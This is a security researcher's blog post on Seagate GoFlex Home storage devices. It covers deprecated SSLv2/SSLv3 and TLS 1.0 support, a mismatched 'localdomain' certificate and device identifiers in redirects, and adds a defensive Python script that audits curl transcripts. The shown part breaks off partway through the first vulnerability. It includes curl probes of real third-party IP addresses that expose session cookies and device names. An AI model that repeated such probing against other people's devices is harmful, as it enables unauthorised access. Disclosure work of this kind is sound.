Pentester's Blog (Aditya K Sood), 2018-01-22: Seagate GoFlex Home Storage Devices: Man-in-the-Middle (MitM) Attacks and Cross-site Scripting in SaaS Web App!
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxC6hKIgQdzcb1oLAtSVw_D3fGx3WnLo92KKeYMUuP2JoFwctFOQS8zJ6m9mBqC9unm-usepaSuxtcx-SQMFIKbbWM_kcypF7pgweW3wUCSfcadSdZjVKjj43DC2T6onpjWP4iMg/s1600/goflex_home_hero_white_hi1.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" data-original-height="1280" data-original-width="1600" height="318" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxC6hKIgQdzcb1oLAtSVw_D3fGx3WnLo92KKeYMUuP2JoFwctFOQS8zJ6m9mBqC9unm-usepaSuxtcx-SQMFIKbbWM_kcypF7pgweW3wUCSfcadSdZjVKjj43DC2T6onpjWP4iMg/s400/goflex_home_hero_white_hi1.jpg" width="400" /></a></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<br />
<style type="text/css">
p.p1 {margin: 0.0px 0.0px 0.0px 0.0px; text-align: center; font: 12.0px 'Helvetica Neue'; color: #454545}
span.s1 {text-decoration: underline}
span.s2 {text-decoration: underline ; color: #e4af0a}
</style>
<br />
<div class="p1">
<blockquote class="tr_bq">
<h2>
<i><span style="color: #660000; font-family: "georgia" , "times new roman" , serif; font-size: large;"><span class="s1"><b>More than 33000 Devices were found to be Vulnerable. During this research, </b></span><b>17000+ URLs of </b><a href="http://seagateshare.com/"><span class="s2"><b>seagateshare.com</b></span></a><b> with unique device_ids were collected.</b></span></i></h2>
</blockquote>
</div>
<div class="p1">
<span style="color: #222222; font-family: "cambria"; font-size: 11pt; white-space: pre;">In this blog post, we discuss the weak encryption protocol support in Seagate GoFlex home-based storage devices and an XSS vulnerability in the supporting SaaS-based web application.</span></div>
</div>
<b id="docs-internal-guid-bc295b3e-1fbf-c045-9ee3-9c13224d9dce" style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">Overview</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">The FreeAgent® GoFlexTM Home network storage system lets you use one external drive for all </span><br />
<span style="background-color: transparent; color: #222222; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">the </span><span style="color: #222222; font-family: "cambria"; font-size: 11pt; white-space: pre;">computers in your home. With enough capacity to support multiple computers and users, you </span><br />
<span style="color: #222222; font-family: "cambria"; font-size: 11pt; white-space: pre;">can easily </span><span style="color: #222222; font-family: "cambria"; font-size: 11pt; white-space: pre;">store all of your files in one centralized location, while automatically and continuously </span><br />
<span style="color: #222222; font-family: "cambria"; font-size: 11pt; white-space: pre;">backing up the files and folders on every computer in your home. For more details about Seagate's GoFlex Home storage system, refer to the links below:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
</div>
<ul>
<li><a href="http://www.seagate.com/support/external-hard-drives/network-storage/goflex-home/" style="font-family: Cambria; font-size: 11pt; text-decoration: none; white-space: pre;">http://www.seagate.com/support/external-hard-drives/network-storage/goflex-home</a></li>
<li><a href="http://support.goflexhome.hipserv.com/en/security/" style="font-family: cambria; font-size: 11pt; text-decoration-line: none; white-space: pre;"><span style="color: #1155cc; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">http://support.goflexhome.hipserv.com/en/security/</span></a><span style="color: #222222; font-family: "cambria"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"> </span></li>
</ul>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span>
<span style="background-color: transparent; color: #222222; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">Working</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Seagate provides a SaaS-based web service at </span><span style="background-color: transparent; color: #1155cc; font-family: "cambria"; font-size: 11pt; font-style: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;"><a href="https://www.seagateshare.com/" style="text-decoration: none;">https://www.seagateshare.com/</a></span><span style="color: #222222; font-family: "cambria"; font-size: 11pt; white-space: pre;"> that allows remote users of a GoFlex home-based device (or service) to upload and store data in the cloud. The "</span><span style="color: #222222; font-family: "cambria"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><i><b>seagateshare.com</b></i></span><span style="color: #222222; font-family: "cambria"; font-size: 11pt; white-space: pre;">" host has the IP address 54.225.93.0, which on a reverse DNS pointer (PTR) lookup points to "ec2seagate.axentra.com". The "ec2seagate.axentra.com" host identifies its web server as "</span><span style="color: #222222; font-family: "cambria"; font-size: 11pt; font-style: italic; vertical-align: baseline; white-space: pre;">Apache/2.2.24 (Amazon) Server at s1.seagateshare.com Port 80</span><span style="color: #222222; font-family: "cambria"; font-size: 11pt; white-space: pre;">".</span>
<span style="color: #222222; font-family: "cambria"; font-size: 11pt; font-style: italic; vertical-align: baseline; white-space: pre;"><br /></span>
<span style="color: #222222; font-family: "cambria"; font-size: 11pt; font-style: italic; vertical-align: baseline; white-space: pre;">The web portal is shown below:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "cambria"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="411" src="https://lh5.googleusercontent.com/tHs0SPHHh_1iMs3dDSgLksgBGsCuZrIr_7OH3h_KfnFJdnFmrXbTbMeabGxZCPl91Cy9Gz7jA8VC24DVPKEd0KAoAvjkQ69l5J9II2eTX1kn2dWQ2a8vOlR6eZUKIoL9rYzZrJYK" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="624" /></span><span style="background-color: transparent; color: #222222; font-family: "cambria"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> </span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">The GoFlex firmware has a built-in HTTP server; for the device to be reachable from </span><a href="http://seagateshare.com/" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: "cambria"; font-size: 11pt; vertical-align: baseline; white-space: pre;">seagateshare.com</span></a><span style="color: #222222; font-family: "cambria"; font-size: 11pt; vertical-align: baseline; white-space: pre;">, port forwarding has to be set up on the home router. When a user opens </span><a href="http://seagateshare.com/" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: "cambria"; font-size: 11pt; vertical-align: baseline; white-space: pre;">seagateshare.com</span></a><span style="color: #222222; font-family: "cambria"; font-size: 11pt; vertical-align: baseline; white-space: pre;"> and provides the device_id, the portal syncs with the GoFlex device and its data can be accessed. When a remote user instead opens the router's public IP address in a browser, the device's HTTP service redirects the browser to </span><a href="http://seagateshare.com/" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: "cambria"; font-size: 11pt; vertical-align: baseline; white-space: pre;">seagateshare.com</span></a><span style="color: #222222; font-family: "cambria"; font-size: 11pt; vertical-align: baseline; white-space: pre;"> for remote access, and the service automatically maps the user's account based on the router's IP address and additional parameters.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">An example is shown below:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="margin-left: 0pt;">
<table style="border-collapse: collapse; border: none; width: 468pt;"><colgroup><col width="*"></col></colgroup><tbody>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">$ curl -v </span><a href="https://89.103.61.141/" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: underline; vertical-align: baseline; white-space: pre;">https://89.103.61.141/</span></a><span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;"> --insecure</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">* Trying 89.103.61.141...</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">* TCP_NODELAY set</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">* Connected to 89.103.61.141 (89.103.61.141) port 443 (#0)</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">* TLS 1.0 connection using TLS_DHE_RSA_WITH_AES_256_CBC_SHA</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">* Server certificate: localdomain</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">> GET / HTTP/1.1</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">> Host: 89.103.61.141</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">> User-Agent: curl/7.51.0</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">> Accept: */*</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">> </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">* HTTP 1.0, assume close after body</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">< HTTP/1.0 302 Found</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">< Date: Sat, 07 Oct 2017 02:49:35 GMT</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">< Server: Apache/2.2.3 (Red Hat)</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">< X-Powered-By: PHP/5.1.6</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">< X-PHP-PID: 6399</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: yellow; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">< Set-Cookie: HOMEBASEID=1fbb991a210c5b7a3f130cf1b3d2215d; </span><br />
<span style="background-color: yellow; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">expires=Sunday, 08-Oct-17 02:49:35 GMT; path=/</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">< Expires: Sat, 07 Oct 2017 05:49:35 GMT</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">< Cache-Control: public, max-age=10800</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">< Last-Modified: Fri, 30 Sep 2011 21:03:07 GMT</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">< Set-Cookie: HOMEBASEID=1fbb991a210c5b7a3f130cf1b3d2215d; expires=Tue, 19-Jan-2038 03:14:07 GMT; path=/</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">< Content-Language: en-US</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">< Window-target: _top</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: yellow; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">< Location: </span><a href="https://www.seagateshare.com/?hipname=pimpi2" style="text-decoration: none;"><span style="background-color: yellow; color: #1155cc; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: underline; vertical-align: baseline; white-space: pre;">https://www.seagateshare.com/?hipname=pimpi2</span></a></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">< X-Axentra-Version: 10.2.0</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">< Content-Length: 0</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">< Connection: close</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">< Content-Type: text/html; charset=UTF-8</span></div>
</td></tr>
</tbody></table>
</div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">The "</span><a href="https://89.103.61.141/" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">https://89.103.61.141/</span></a><span style="color: black; font-family: "cambria"; font-size: 11pt; vertical-align: baseline; white-space: pre;">" device runs an HTTPS service and, when a connection is initiated, redirects the browser to </span><a href="http://seagateshare.com/" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: "cambria"; font-size: 11pt; vertical-align: baseline; white-space: pre;">seagateshare.com</span></a><span style="color: black; font-family: "cambria"; font-size: 11pt; vertical-align: baseline; white-space: pre;"> as shown above. Note that the certificate is issued for "localdomain" rather than for the device's address, which is why curl needed --insecure. The same "</span><a href="https://89.103.61.141/" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: "cambria"; font-size: 11pt; vertical-align: baseline; white-space: pre;">https://89.103.61.141/</span></a><span style="color: black; font-family: "cambria"; font-size: 11pt; vertical-align: baseline; white-space: pre;">" server also accepts SSLv2/SSLv3.</span></div>
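<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: #222222; font-family: "cambria"; font-size: 11pt;">The following audit script is an added example, not code from the original post or from Seagate: it parses a curl -v transcript like the one above and reports the points this post raises (a pre-TLS 1.2 handshake, a certificate that cannot be validated for the host, and the device identifier carried in the redirect URL), plus the cookie-flag and cipher-suite checks a reviewer would add. The sample transcript is constructed (documentation address 192.0.2.10, placeholder cookie and hipname values).</span></div>

```python
"""Audit a `curl -v` transcript for the weaknesses described in this post:
legacy SSL/TLS negotiation, an unverifiable device certificate, a cookie
without Secure/HttpOnly, and a device identifier in the redirect URL."""
import re
from dataclasses import dataclass, field
from urllib.parse import parse_qs, urlsplit

# Constructed sample modelled on the exchange shown above: documentation
# address 192.0.2.10, placeholder cookie and hipname values (not captured).
SAMPLE_TRANSCRIPT = """\
* TLS 1.0 connection using TLS_DHE_RSA_WITH_AES_256_CBC_SHA
* Server certificate: localdomain
> GET / HTTP/1.1
> Host: 192.0.2.10
< HTTP/1.0 302 Found
< Server: Apache/2.2.3 (Red Hat)
< Set-Cookie: HOMEBASEID=PLACEHOLDER00000000000000000000000; expires=Tue, 19-Jan-2038 03:14:07 GMT; path=/
< Location: https://www.seagateshare.com/?hipname=example-device
"""

# Protocol versions as (major, minor) on the wire; TLS 1.2 is the floor.
_VERSIONS = {"SSLv2": (2, 0), "SSLv3": (3, 0), "TLSv1": (3, 1), "TLS 1.0": (3, 1),
             "TLSv1.1": (3, 2), "TLS 1.1": (3, 2), "TLSv1.2": (3, 3),
             "TLS 1.2": (3, 3), "TLSv1.3": (3, 4), "TLS 1.3": (3, 4)}
_MIN_OK = (3, 3)
# curl prints the negotiated protocol in one of two shapes depending on its
# TLS backend: "* TLS 1.0 connection using <suite>" (as in this post) or
# "* SSL connection using <version> / <suite>" (OpenSSL-backed builds).
_PROTO_RE = (
    re.compile(r"^\* (?P<proto>SSLv[23]|TLS \d\.\d) connection using (?P<cipher>\S+)"),
    re.compile(r"^\* SSL connection using (?P<proto>SSLv3|TLSv1(?:\.\d)?) / (?P<cipher>\S+)"),
)
# Heuristic: IANA names carry "_CBC_"; OpenSSL names for CBC/HMAC-SHA1 suites end in "-SHA".
_LEGACY_CIPHER_RE = re.compile(r"[_-]CBC[_-]|[_-]SHA$")


@dataclass
class Observation:
    host: str = ""
    proto: str = ""
    cipher: str = ""
    cert_subject: str = ""
    cookies: list = field(default_factory=list)
    location: str = ""


def parse_transcript(text: str) -> Observation:
    """Extract the handshake and response fields we audit from curl -v output."""
    obs = Observation()
    for line in text.splitlines():
        line = line.rstrip()
        for rx in _PROTO_RE:
            m = rx.match(line)
            if m:
                obs.proto, obs.cipher = m["proto"], m["cipher"]
        if line.startswith("* Server certificate:"):
            obs.cert_subject = line.split(":", 1)[1].strip()
        elif line.startswith("> Host:"):
            obs.host = line.split(":", 1)[1].strip()
        elif line.lower().startswith("< set-cookie:"):
            obs.cookies.append(line.split(":", 1)[1].strip())
        elif line.lower().startswith("< location:"):
            obs.location = line.split(":", 1)[1].strip()
    return obs


def audit(obs: Observation) -> list:
    """Return (code, detail) findings; codes are stable so they can feed alerting."""
    out = []
    ver = _VERSIONS.get(obs.proto)
    if ver is not None and ver < _MIN_OK:
        out.append(("LEGACY_PROTOCOL", f"{obs.proto} negotiated; offer TLS 1.2+ only"))
    if obs.cipher and _LEGACY_CIPHER_RE.search(obs.cipher):
        out.append(("LEGACY_CIPHER", f"{obs.cipher} is a CBC/HMAC-SHA1 suite; prefer AEAD"))
    if obs.cert_subject and obs.host and obs.cert_subject.lower() != obs.host.lower():
        out.append(("CERT_HOST_MISMATCH", f"cert subject '{obs.cert_subject}' != host "
                    f"'{obs.host}'; clients must skip verification, which enables MitM"))
    for raw in obs.cookies:
        name_value, *attrs = (p.strip() for p in raw.split(";"))
        flags = {a.split("=", 1)[0].lower() for a in attrs}
        missing = [f for f in ("secure", "httponly") if f not in flags]
        if missing:
            out.append(("COOKIE_FLAGS", f"cookie {name_value.split('=', 1)[0]} lacks {', '.join(missing)}"))
    params = sorted(parse_qs(urlsplit(obs.location).query)) if obs.location else []
    if params:
        out.append(("ID_IN_REDIRECT_URL", f"redirect exposes {params} in the query string "
                    "(browser history, proxy and referer logs)"))
    return out


def audit_transcript(text: str) -> list:
    """Finding codes only, in detection order."""
    return [code for code, _ in audit(parse_transcript(text))]


if __name__ == "__main__":
    for code, detail in audit(parse_transcript(SAMPLE_TRANSCRIPT)):
        print(f"[{code}] {detail}")
```

Feed it a transcript captured against your own device before and after disabling SSLv2/SSLv3 on it to confirm the LEGACY_PROTOCOL finding disappears.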
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: underline; vertical-align: baseline; white-space: pre;">Vulnerability 1:</span><span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;"> Weak Encryption Protocol Support: SSLv2/SSLv3</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">It has been discovered that the embedded server still supports SSLv2/SSLv3, whereas </span><br />
<a href="http://seagateshare.com/" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">seagateshare.com</span></a><span style="color: #222222; font-family: "cambria"; font-size: 11pt; white-space: pre;"> supports SSLv3. Both SSL versions are deprecated because they are prone to man-in-the-middle attacks. A complete workflow example is shown below:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="margin-left: 0pt;">
<table style="border-collapse: collapse; border: none; width: 468pt;"><colgroup><col width="*"></col></colgroup><tbody>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: yellow; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">$ curl -v https://81.107.113.155 --insecure</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">* Rebuilt URL to: https://81.107.113.155/</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">* Trying 81.107.113.155...</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">* TCP_NODELAY set</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">* Connected to 81.107.113.155 (81.107.113.155) port 443 (#0)</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">* WARNING: disabling hostname validation also disables SNI.</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">* TLS 1.0 connection using TLS_DHE_RSA_WITH_AES_256_CBC_SHA</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">* Server certificate: localdomain</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
